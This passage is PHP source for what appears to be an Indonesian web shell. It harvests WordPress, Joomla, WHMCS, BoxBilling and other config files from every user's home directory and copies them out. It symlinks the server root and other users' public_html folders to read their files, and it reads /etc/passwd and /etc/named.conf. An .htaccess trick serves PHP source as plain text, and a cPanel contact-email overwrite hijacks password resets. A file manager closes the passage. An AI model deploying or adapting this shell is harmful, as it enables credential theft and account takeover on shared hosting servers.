  936. "/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress",
  937. "/home/$user_con/public_html/test/wp-config.php" => "Wordpress",
  938. "/home/$user_con/public_html/demo/wp-config.php" => "Wordpress",
  939. "/home/$user_con/public_html/home/wp-config.php" => "Wordpress",
  940. "/home/$user_con/public_html/v1/wp-config.php" => "Wordpress",
  941. "/home/$user_con/public_html/v2/wp-config.php" => "Wordpress",
  942. "/home/$user_con/public_html/press/wp-config.php" => "Wordpress",
  943. "/home/$user_con/public_html/new/wp-config.php" => "Wordpress",
  944. "/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress",
  945. "/home/$user_con/public_html/configuration.php" => "Joomla",
  946. "/home/$user_con/public_html/blog/configuration.php" => "Joomla",
  947. "/home/$user_con/public_html/submitticket.php" => "^WHMCS",
  948. "/home/$user_con/public_html/cms/configuration.php" => "Joomla",
  949. "/home/$user_con/public_html/beta/configuration.php" => "Joomla",
  950. "/home/$user_con/public_html/portal/configuration.php" => "Joomla",
  951. "/home/$user_con/public_html/site/configuration.php" => "Joomla",
  952. "/home/$user_con/public_html/main/configuration.php" => "Joomla",
  953. "/home/$user_con/public_html/home/configuration.php" => "Joomla",
  954. "/home/$user_con/public_html/demo/configuration.php" => "Joomla",
  955. "/home/$user_con/public_html/test/configuration.php" => "Joomla",
  956. "/home/$user_con/public_html/v1/configuration.php" => "Joomla",
  957. "/home/$user_con/public_html/v2/configuration.php" => "Joomla",
  958. "/home/$user_con/public_html/joomla/configuration.php" => "Joomla",
  959. "/home/$user_con/public_html/new/configuration.php" => "Joomla",
  960. "/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS",
  961. "/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS",
  962. "/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS",
  963. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
  964. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
  965. "/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS",
  966. "/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS",
  967. "/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS",
  968. "/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS",
  969. "/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS",
  970. "/home/$user_con/public_html/whm/submitticket.php" => "WHMCS",
  971. "/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS",
  972. "/home/$user_con/public_html/Host/submitticket.php" => "WHMCS",
  973. "/home/$user_con/public_html/host/submitticket.php" => "WHMCS",
  974. "/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  975. "/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS",
  976. "/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS",
  977. "/home/$user_con/public_html/domains/submitticket.php" => "WHMCS",
  978. "/home/$user_con/public_html/domain/submitticket.php" => "WHMCS",
  979. "/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS",
  980. "/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS",
  981. "/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS",
  982. "/home/$user_con/public_html/CART/submitticket.php" => "WHMCS",
  983. "/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS",
  984. "/home/$user_con/public_html/cart/submitticket.php" => "WHMCS",
  985. "/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS",
  986. "/home/$user_con/public_html/Order/submitticket.php" => "WHMCS",
  987. "/home/$user_con/public_html/order/submitticket.php" => "WHMCS",
  988. "/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS",
  989. "/home/$user_con/public_html/Client/submitticket.php" => "WHMCS",
  990. "/home/$user_con/public_html/client/submitticket.php" => "WHMCS",
  991. "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  992. "/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS",
  993. "/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS",
  994. "/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS",
  995. "/home/$user_con/public_html/Support/submitticket.php" => "WHMCS",
  996. "/home/$user_con/public_html/support/submitticket.php" => "WHMCS",
  997. "/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS",
  998. "/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS",
  999. "/home/$user_con/public_html/billing/submitticket.php" => "WHMCS",
  1000. "/home/$user_con/public_html/BUY/submitticket.php" => "WHMCS",
  1001. "/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS",
  1002. "/home/$user_con/public_html/buy/submitticket.php" => "WHMCS",
  1003. "/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS",
  1004. "/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS",
  1005. "/home/$user_con/public_html/manage/submitticket.php" => "WHMCS",
  1006. "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1007. "/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1008. "/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1009. "/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS",
  1010. "/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1011. "/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS",
  1012. "/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS",
  1013. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1014. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
  1015. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
  1016. "/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS",
  1017. "/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS",
  1018. "/home/$user_con/public_html/basket/submitticket.php" => "WHMCS",
  1019. "/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS",
  1020. "/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS",
  1021. "/home/$user_con/public_html/secure/submitticket.php" => "WHMCS",
  1022. "/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS",
  1023. "/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS",
  1024. "/home/$user_con/public_html/sales/submitticket.php" => "WHMCS",
  1025. "/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS",
  1026. "/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS",
  1027. "/home/$user_con/public_html/bill/submitticket.php" => "WHMCS",
  1028. "/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1029. "/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS",
  1030. "/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS",
  1031. "/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1032. "/home/$user_con/public_html/Account/submitticket.php" => "WHMCS",
  1033. "/home/$user_con/public_html/account/submitticket.php" => "WHMCS",
  1034. "/home/$user_con/public_html/USER/submitticket.php" => "WHMCS",
  1035. "/home/$user_con/public_html/User/submitticket.php" => "WHMCS",
  1036. "/home/$user_con/public_html/user/submitticket.php" => "WHMCS",
  1037. "/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1038. "/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS",
  1039. "/home/$user_con/public_html/clients/submitticket.php" => "WHMCS",
  1040. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1041. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
  1042. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
  1043. "/home/$user_con/public_html/MY/submitticket.php" => "WHMCS",
  1044. "/home/$user_con/public_html/My/submitticket.php" => "WHMCS",
  1045. "/home/$user_con/public_html/my/submitticket.php" => "WHMCS",
  1046. "/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS",
  1047. "/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1048. "/home/$user_con/public_html/panel/submitticket.php" => "WHMCS",
  1049. "/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS",
  1050. "/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS",
  1051. "/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS",
  1052. "/home/$user_con/public_html/bb-config.php" => "BoxBilling",
  1053. "/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1054. "/home/$user_con/public_html/box/bb-config.php" => "BoxBilling",
  1055. "/home/$user_con/public_html/host/bb-config.php" => "BoxBilling",
  1056. "/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling",
  1057. "/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling",
  1058. "/home/$user_con/public_html/support/bb-config.php" => "BoxBilling",
  1059. "/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling",
  1060. "/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling",
  1061. "/home/$user_con/public_html/order/bb-config.php" => "BoxBilling",
  1062. "/home/$user_con/public_html/client/bb-config.php" => "BoxBilling",
  1063. "/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling",
  1064. "/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling",
  1065. "/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling",
  1066. "/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling",
  1067. "/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling",
  1068. "/home/$user_con/public_html/my/bb-config.php" => "BoxBilling",
  1069. "/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling",
  1070. "/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling",
  1071. "/home/$user_con/public_html/includes/dist-configure.php" => "Zencart",
  1072. "/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1073. "/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart",
  1074. "/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart",
  1075. "/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart",
  1076. "/home/$user_con/public_html/includes/iso4217.php" => "Hostbills",
  1077. "/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1078. "/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills",
  1079. "/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills",
  1080. "/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1081. "/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills",
  1082. "/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1083. "/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills",
  1084. "/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills",
  1085. "/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills",
  1086. "/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills",
  1087. "/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1088. "/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1089. "/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills",
  1090. "/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills",
  1091. "/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills",
  1092. "/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills",
  1093. "/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1094. ];
  1095. foreach($grab_config as $config => $nama_config) {
  1096. $ambil_config = file_get_contents($config);
  1097. if($ambil_config == '') {
  1098. } else {
  1099. $file_config = fopen("codexploit_configs/$user_con-$nama_config.txt","w");
  1100. fputs($file_config,$ambil_config);
  1101. }
  1102. }
  1103. }
  1104. }
  1105. }
  1106. }
  1107. echo "<center><a href='?dir=$path/codexploit_configs'><font color=lime>Done</font></a></center>";
  1108. }
  1110. /*
  1111. Adminer
  1112. */
  1113. if($_GET['aksi'] == 'adminer') {
  1114. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  1115. function adminer($url, $isi) {
  1116. $fp = fopen($isi, "w");
  1117. $ch = curl_init();
  1118. curl_setopt($ch, CURLOPT_URL, $url);
  1119. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1120. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1121. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1122. curl_setopt($ch, CURLOPT_FILE, $fp);
  1123. return curl_exec($ch);
  1124. curl_close($ch);
  1125. fclose($fp);
  1126. ob_flush();
  1127. flush();
  1128. }
  1129. if(file_exists('adminer.php')) {
  1130. echo "<center><a href='$full/adminer.php' target='_blank'>-> Silahkan Login Adminer <-</a></font></center><br/>";
  1131. } else {
  1132. if(adminer("","adminer.php")) {
  1133. echo "<center><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center><br/>";
  1134. } else {
  1135. echo "<center><font color=red>gagal buat file adminer</font></center><br/>";
  1136. }
  1137. }
  1138. exit;
  1139. }
  1142. /*
  1143. Symlink
  1144. */
  1145. if($_GET['aksi'] == 'symlink') {
  1146. if(!is_file('named.txt')){
  1147. $d00m = @file("/etc/named.conf");
  1148. }else{
  1149. $d00m = @file("named.txt");
  1150. }
  1151. if(!$d00m) {
  1152. die ("<center>
  1153. [ <a href='?dir=$path&aksi=symread'>Bypass Read</a> ]
  1154. [ <a href='?dir=$path&aksi=sym_404'>Symlink 404</a> ]
  1155. [ <a href='?dir=$path&aksi=sym_bypas'>Bypass Symlink</a> ]
  1156. <br/>
  1157. <font color='red'>Gagal Membaca /etc/named.conf</font>
  1158. <br/><br/></center>");
  1159. }
  1160. else{
  1161. echo "<center>
  1162. [ <a href='?dir=$path&aksi=symread'>Bypass Read</a> ]
  1163. [ <a href='?dir=$path&aksi=sym_404'>Symlink 404</a> ]
  1164. [ <a href='?dir=$path&aksi=sym_bypas'>Bypass Symlink</a> ]
  1165. <div class='tmp'></center>
  1166. <table align='center' width='100%'>
  1167. <thead class='bg-info'>
  1168. <th>Domains</th>
  1169. <th>Users</th>
  1170. <th>symlink </th>
  1171. </thead>";
  1172. foreach($d00m as $dom){
  1173. if(eregi("zone",$dom)){
  1174. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1175. flush();
  1176. if(strlen(trim($domsws[1][0])) > 2){
  1177. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1178. flush();
  1179. $site = $user['name'] ;
  1180. @symlink("/","sym/root");
  1181. $site = $domsws[1][0];
  1182. $ir = 'ir';
  1183. $il = 'il';
  1184. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) ) {
  1185. $site = ".$domsws[1][0].";
  1186. }
  1187. echo "
  1188. <tr>
  1189. <td>
  1190. <a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a>
  1191. </td>
  1192. <td>
  1193. ".$user['name']."
  1194. </td>
  1195. <td>
  1196. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>Symlink</a>
  1197. </td>
  1198. </tr>";
  1199. flush();
  1200. flush();
  1201. }
  1202. }
  1203. }
  1204. echo "</table>
  1205. </div><br/>";
  1206. }
  1207. exit;
  1208. }
  1210. if($_GET['aksi'] == 'symread') {
  1211. echo "read /etc/named.conf";
  1212. echo "<form method='post' action='?dir=$dir&aksi=symread&save=1'>
  1213. <textarea class='form-control' rows='8' name='file'>";
  1214. flush();
  1215. flush();
  1216. $file = '/etc/named.conf';
  1217. $r3ad = @fopen($file, 'r');
  1218. if ($r3ad){
  1219. $content = @fread($r3ad, @filesize($file));
  1220. echo "".htmlentities($content)."";
  1221. }else if (!$r3ad) {
  1222. $r3ad = @show_source($file) ;
  1223. }else if (!$r3ad) {
  1224. $r3ad = @highlight_file($file);
  1225. }else if (!$r3ad) {
  1226. $sm = @symlink($file,'sym.txt');
  1227. if ($sm){
  1228. $r3ad = @fopen('sym/sym.txt', 'r');
  1229. $content = @fread($r3ad, @filesize($file));
  1230. echo "".htmlentities($content)."";
  1231. }
  1232. }
  1233. echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>";
  1234. if(isset($_GET['save'])){
  1235. $cont = stripcslashes($_POST['file']);
  1236. $f = fopen('named.txt','w');
  1237. $w = fwrite($f,$cont);
  1238. if($w){
  1239. echo '<br/>save has been successfully';
  1240. }
  1241. fclose($f);
  1242. }
  1243. exit;
  1244. }
  1246. if ($_GET['aksi'] == 'sym_404'){
  1247. echo '<h2>Symlink 404</h2>
  1248. <form method="post">
  1249. File Target: <input type="text" class="form-control" name="dir" value="/home/user/public_html/wp-config.php"><br>
  1250. Save As: <input type="text" class="form-control" name="isi" placeholder="[Ex] file.txt"/><br/>
  1251. <input type="submit" class="btn btn-danger btn-block" value="Execute" name="execute"/>
  1252. </form>';
  1253. if($_POST['execute']){
  1254. rmdir("xploit404");
  1255. mkdir("xploit404", 0777);
  1256. $dir = $_POST['dir'];
  1257. $isi = $_POST['isi'];
  1258. system("ln -s ".$dir."xploit404/".$isi);
  1259. symlink($dir,"xploit404/".$isi);
  1260. $inija = fopen("xploit404/.htaccess", "w");
  1261. fwrite($inija,"ReadmeName ".$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain .php\nAddHandler text/plain .php\nSatisfy Any");
  1262. echo'<a href="/xploit404/" target="_blank"> >>Sukses<< </a>';
  1263. }
  1264. exit;
  1265. }
  1268. if ($_GET['aksi'] == 'sym_bypas'){
  1269. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  1270. $cont = stripcslashes($_POST['file']);
  1271. if(!file_exists('passwd.txt')){
  1272. $f = @fopen('passwd.txt','w');
  1273. $w = @fwrite($f,$cont);
  1274. fclose($f);
  1275. }
  1276. if($w or @filesize('passwd.txt') > 0){
  1277. echo "<div class='tmp'>
  1278. <table width='100%'>
  1279. <thead class='bg-info'>
  1280. <th>Users</th>
  1281. <th>symlink</th>
  1282. <th>FTP</th>
  1283. </thead>";
  1284. flush();
  1285. $fil3 = file('passwd.txt');
  1286. foreach ($fil3 as $f){
  1287. $u=explode(':', $f);
  1288. $user = $u['0'];
  1289. echo "<tr>
  1290. <td class='left'>$user</td>
  1291. <td>
  1292. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  1293. </td>
  1294. <td>
  1295. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  1296. </td>
  1297. </tr>";
  1298. flush();
  1299. flush();
  1300. }
  1301. die ("</tr></table></div>");
  1302. }
  1304. }
  1306. echo "read /etc/passwd";
  1307. echo "<br/><form method='post' action='?dir=$dir&aksi=sym_bypas&save=1'>
  1308. <textarea class='form-control' rows='8' name='file'>";
  1309. flush();
  1310. $file = '/etc/passwd';
  1311. $r3ad = @fopen($file, 'r');
  1312. if ($r3ad){
  1313. $content = @fread($r3ad, @filesize($file));
  1314. echo "".htmlentities($content)."";
  1315. }elseif(!$r3ad) {
  1316. $r3ad = @show_source($file) ;
  1317. }elseif(!$r3ad) {
  1318. $r3ad = @highlight_file($file);
  1319. }elseif(!$r3ad) {
  1321. for($uid=0;$uid<1000;$uid++){
  1322. $ara = posix_getpwuid($uid);
  1323. if (!empty($ara)) {
  1324. while (list ($key, $val) = each($ara)){
  1325. print "$val:";
  1326. }
  1327. print "\n";
  1328. }
  1329. }
  1330. }
  1331. flush();
  1332. echo "</textarea><br/>
  1333. <input type='submit' class='btn btn-danger btn-block' value='Symlink'/><br/>
  1334. </form>";
  1335. flush();
  1336. exit;
  1337. }
  1340. if ($_GET['aksi'] == 'CpanelReset') {
  1341. echo '<br/><p class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</p>
  1342. <form method="POST">
  1343. <div class="form-group">
  1344. <input type="email" name="email" class="form-control" placeholder="Masukan Email..."/><br/>
  1345. <input type="submit" name="submit" class="btn btn-danger btn-block" value="Send"/>
  1346. </div>
  1347. </form>';
  1349. if(isset($_POST['submit'])){
  1350. $user = get_current_user();
  1351. $site = $_SERVER['HTTP_HOST'];
  1352. $ips = getenv('REMOTE_ADDR');
  1353. $email = $_POST['email'];
  1354. $wr = 'email:'.$email;
  1355. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
  1356. fwrite($f, $wr);
  1357. fclose($f);
  1358. $f = fopen('/home/'.$user.'/.contactinfo', 'w');
  1359. fwrite($f, $wr);
  1360. fclose($f);
  1361. $parm = $site.':2082/resetpass?start=1';
  1362. echo '<br/>Url: '.$parm.'';
  1363. echo '<br/>Username: '.$user.'';
  1364. echo '<br/>Success Reset To: '.$email.'<br/><br/>';
  1365. }
  1366. exit;
  1367. }
  1369. if(isset($_GET['path'])){
  1370. $path = $_GET['path'];
  1371. chdir($path);
  1372. }else{
  1373. $path = getcwd();
  1374. }
  1375. $path = str_replace('\\','/',$path);
  1376. $paths = explode('/',$path);
  1377. echo "<br/>Lokasi Saat Ini => ";
  1378. foreach($paths as $id=>$pat){
  1379. if($pat == '' && $id == 0){
  1380. $a = true;
  1381. echo '<a href="?dir=/">/</a>';
  1382. continue;
  1383. }
  1384. if($pat == '') continue;
  1385. echo '<a href="?dir=';
  1386. for($i=0;$i<=$id;$i++){
  1387. echo "$paths[$i]";
  1388. if($i != $id) echo "/";
  1389. }
  1390. echo '">'.$pat.'</a>/';
  1391. }
  1392. $scandir = scandir($path);
  1393. echo "<hr>";
  1394. echo '<div class="table-responsive-lg">
  1395. <table class="table table-hover table-bordered text-white">
  1396. <thead class="bg-warning text-dark text-center">
  1397. <th scope="col">Nama</th>
  1398. <th scope="col">Type</th>
  1399. <th scope="col">Size</th>
  1400. <th scope="col">Permission</th>
  1401. <th scope="col">Action</th>
  1402. </thead>';
  1404. foreach($scandir as $dir){
  1406. /* cek jika ini berbentuk folder */
  1407. /* cek jika nama folder karaker terlalu panjang */
  1408. if (strlen($dir) > 25) {
  1409. $_dir = substr($dir, 0, 25)."...";
  1410. }else{
  1411. $_dir = $dir;
  1412. }
  1413. if(!is_dir($path.'/'.$file)) continue;
  1414. $size = filesize($path.'/'.$file)/1024;
  1415. $size = round($size,3);
  1417. if($size >= 1024){
  1418. $size = round($size/1024,2).' MB';
  1419. }else{
  1420. $size = $size.' KB';
  1421. }
  1422. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  1423. echo
  1424. '<tr>
  1425. <td class="text-white">
  1426. <img src="" class="ico"></img> <a href="?dir='.$path.'/'.$dir.'">'.$_dir.'</a></td>
  1427. <td class="text-center">Directory</td>
  1428. <td class="text-white"><center>'.$size.'</center></td>
  1429. <td class="text-white"><center>';
  1430. if(is_writable($path.'/'.$dir)) echo '<font color="#00ff00">';
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  1432. echo perms($path.'/'.$dir);
  1433. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font></center></td>
  1434. <td><center>
  1435. <a title="Ubah Nama" class="badge" href="?dir='.$path.'/'.$dir.'&aksi=rename_folder">&nbsp;Ubah Nama</a>&nbsp;&nbsp;
  1436. <a title="Delete" class="badge" href="?dir='.$path.'/'.$dir.'&aksi=hapus_folder">&nbsp;Hapus</a>
  1437. </td>
  1438. ';
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  1515. echo' <a href="?dir='.$path.'&aksi=view&dirf='.$path.'/'.$file.'">'.$_file.'</a></td>';
  1516. echo '<td class="text-center">';
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  1568. echo '</td>
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  1571. if(is_writable($path.'/'.$file)) echo '<font color="#00ff00">';
  1572. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  1573. echo perms($path.'/'.$file);
  1574. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>
  1575. <td class="text-center">
  1576. <a title="Lihat" class="badge" href="?dir='.$path.'&aksi=view&dirf='.$path.'/'.$file.'">Lihat</a>
  1577. <a title="Edit" class="badge" href="?dir='.$path.'&aksi=edit&dirf='.$path.'/'.$file.'">Edit</a>
  1578. <a title="Edit" class="badge" href="?dir='.$path.'&aksi=rename&dirf='.$path.'/'.$file.'">Ubah Nama</a>
  1579. <a class="badge" href="?dir='.$path.'&aksi=hapusf&dirf='.$path.'/'.$file.'" title="Delete">Hapus</a>
  1580. </td>
  1581. </tr>';
  1582. }
  1583. echo '</table></div><hr/>';
  1584. echo "<a href='' class='scrollToTop'><i class='fas fa-arrow-up up'></i></a>";
  1585. echo '<center><small>Copyright all right reserved '.date('M-Y').' <a href="">Indonesian Error System</a></small></center>';
  1586. ?>
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